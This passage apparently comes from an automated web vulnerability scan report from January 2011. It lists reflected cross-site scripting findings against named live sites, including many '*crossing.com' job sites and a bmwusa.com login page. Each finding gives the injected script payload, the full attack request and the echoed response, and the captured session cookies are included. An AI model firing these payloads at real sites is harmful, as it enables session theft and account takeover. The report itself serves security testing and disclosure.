Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133156

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.bilingualcrossing.com/?70508"><script>alert(1)</script>8ee9c52dde1=1">
...[SNIP]...

3.18. http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d14"><script>alert(1)</script>e5a2e9ead51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10d14"><script>alert(1)</script>e5a2e9ead51=1 HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rugpvnfefu0ijcftjlrvftr4p6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119759

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.biotechcrossing.com/?10d14"><script>alert(1)</script>e5a2e9ead51=1">
...[SNIP]...

3.19. http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b61"><script>alert(1)</script>5c6959b8b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a6b61"><script>alert(1)</script>5c6959b8b1b=1 HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6aoaisevp9dgsf3glk0u3kfmh2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149457

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.bluecollarcrossing.com/?a6b61"><script>alert(1)</script>5c6959b8b1b=1">
...[SNIP]...

3.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8ef'-alert(1)-'df58b41138a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Secured/Content9d8ef'-alert(1)-'df58b41138a/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:52:57 GMT
Content-Length: 855
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:12:57 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...
<![CDATA[
window.top.location.href = '/Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fContent9d8ef'-alert(1)-'df58b41138a%2fForms%2fLogin.aspx&Scheme=http';//]]>
...[SNIP]...

3.21. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b684e'-alert(1)-'9a7cf2385d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Secured/Content/Formsb684e'-alert(1)-'9a7cf2385d7/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:53:01 GMT
Content-Length: 855
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:13:01 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...
<![CDATA[
window.top.location.href = '/Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fContent%2fFormsb684e'-alert(1)-'9a7cf2385d7%2fLogin.aspx&Scheme=http';//]]>
...[SNIP]...

3.22. http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49621"><script>alert(1)</script>9f0d446c23d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?49621"><script>alert(1)</script>9f0d446c23d=1 HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nko903j62s8hf5uker5sj8gj93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124014

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.businessanalystcrossing.com/?49621"><script>alert(1)</script>9f0d446c23d=1">
...[SNIP]...

3.23. http://www.businessdevelopmentcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aad7"><script>alert(1)</script>02c3a5f308a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9aad7"><script>alert(1)</script>02c3a5f308a=1 HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=v9534hooe5m897h1jlbrva77o0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116498

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.businessdevelopmentcrossing.com/?9aad7"><script>alert(1)</script>02c3a5f308a=1">
...[SNIP]...

3.24. http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6504"><script>alert(1)</script>7995d983aaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c6504"><script>alert(1)</script>7995d983aaf=1 HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukmvtrcjop68ja9nosi7cu1gh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128714

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.callcentercrossing.com/?c6504"><script>alert(1)</script>7995d983aaf=1">
...[SNIP]...

3.25. http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e49f"><script>alert(1)</script>83eb7ba08ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7e49f"><script>alert(1)</script>83eb7ba08ba=1 HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=h114rspv6dqv9rpk6cv7rlc1e3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108693

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.chefcrossing.com/?7e49f"><script>alert(1)</script>83eb7ba08ba=1">
...[SNIP]...

3.26. http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7038b"><script>alert(1)</script>ca314792d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7038b"><script>alert(1)</script>ca314792d87=1 HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qi73gk7b0plggdca89edb7am13; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106933

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.civilengineeringcrossing.com/?7038b"><script>alert(1)</script>ca314792d87=1">
...[SNIP]...

3.27. http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55eeb"><script>alert(1)</script>20005e8749b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?55eeb"><script>alert(1)</script>20005e8749b=1 HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fqj28nd85kg23ge7evi2b009i7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115435

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.clevelcrossing.com/?55eeb"><script>alert(1)</script>20005e8749b=1">
...[SNIP]...

3.28. http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858e3"><script>alert(1)</script>870d36a3611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?858e3"><script>alert(1)</script>870d36a3611=1 HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m4vok3ds4b8veedmh32e13pcl6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101481

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.clinicalresearchcrossing.com/?858e3"><script>alert(1)</script>870d36a3611=1">
...[SNIP]...

3.29. http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72153"><script>alert(1)</script>0fab5129a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?72153"><script>alert(1)</script>0fab5129a6b=1 HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mb7anjkk7acvsh1kr8ousr40i4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135107

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.compliancecrossing.com/?72153"><script>alert(1)</script>0fab5129a6b=1">
...[SNIP]...

3.30. http://www.computeraideddesigncrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1752d"><script>alert(1)</script>11735ab5ac7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1752d"><script>alert(1)</script>11735ab5ac7=1 HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

